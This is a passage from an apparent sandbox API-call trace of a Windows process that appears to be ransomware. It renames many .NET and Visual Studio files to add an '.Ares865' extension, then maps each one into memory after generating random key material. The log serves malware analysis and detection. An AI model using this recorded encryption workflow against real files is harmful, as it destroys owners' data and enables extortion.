dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd80) returned 0x190000 [0054.996] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0054.997] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0054.997] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0054.997] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0055.028] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.Ares865") returned 81 [0055.028] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml.ares865"), dwFlags=0x1) returned 1 [0055.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.029] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=15715) returned 1 [0055.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0055.029] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0055.030] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.030] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0055.030] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4070, lpName=0x0) returned 0x120 [0055.032] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4070) returned 0x190000 [0055.033] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0055.034] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.034] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0055.034] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0055.035] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.Ares865") returned 83 [0055.035] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml.ares865"), dwFlags=0x1) returned 1 [0055.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.036] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8220) returned 1 [0055.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.037] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0055.037] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0055.037] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.037] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0055.038] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2320, lpName=0x0) returned 0x120 [0055.039] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2320) returned 0x190000 [0055.040] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0055.041] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.041] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0055.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3750 [0055.104] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip.Ares865") returned 133 [0055.104] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip.ares865"), dwFlags=0x1) returned 1 [0055.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.104] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1117) returned 1 [0055.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.105] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.105] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.105] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.106] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.106] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.106] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x120 [0055.108] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x190000 [0055.121] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.121] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.121] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.122] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip.Ares865") returned 129 [0055.122] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip.ares865"), dwFlags=0x1) returned 1 [0055.124] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.124] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1157) returned 1 [0055.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.125] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.126] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.126] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.126] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x120 [0055.128] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x190000 [0055.129] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.129] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.129] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.130] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.130] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip.Ares865") returned 114 [0055.130] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip.ares865"), dwFlags=0x1) returned 1 [0055.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.131] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=589) returned 1 [0055.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.131] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.132] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.132] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.132] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x120 [0055.134] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x190000 [0055.135] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.136] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.136] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.136] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.136] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip.Ares865") returned 116 [0055.136] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip.ares865"), dwFlags=0x1) returned 1 [0055.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.137] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1192) returned 1 [0055.137] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.138] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.139] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.139] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.139] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x120 [0055.141] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x190000 [0055.142] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.142] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.142] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.143] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.143] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip.Ares865") returned 115 [0055.143] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip.ares865"), dwFlags=0x1) returned 1 [0055.144] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.144] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2036) returned 1 [0055.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.144] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.145] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.145] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.145] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb00, lpName=0x0) returned 0x120 [0055.147] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb00) returned 0x190000 [0055.148] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.149] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.149] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.150] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip.Ares865") returned 122 [0055.150] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip.ares865"), dwFlags=0x1) returned 1 [0055.151] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.151] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=859) returned 1 [0055.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.151] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.152] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.152] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.152] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x660, lpName=0x0) returned 0x120 [0055.153] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x660) returned 0x190000 [0055.157] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.157] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.157] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.157] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6010 [0055.158] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip.Ares865") returned 117 [0055.158] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip.ares865"), dwFlags=0x1) returned 1 [0055.158] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.159] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=20394) returned 1 [0055.159] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.159] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f98 [0055.159] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.159] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.160] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.160] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.160] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x52b0, lpName=0x0) returned 0x120 [0055.162] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x52b0) returned 0x190000 [0055.164] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 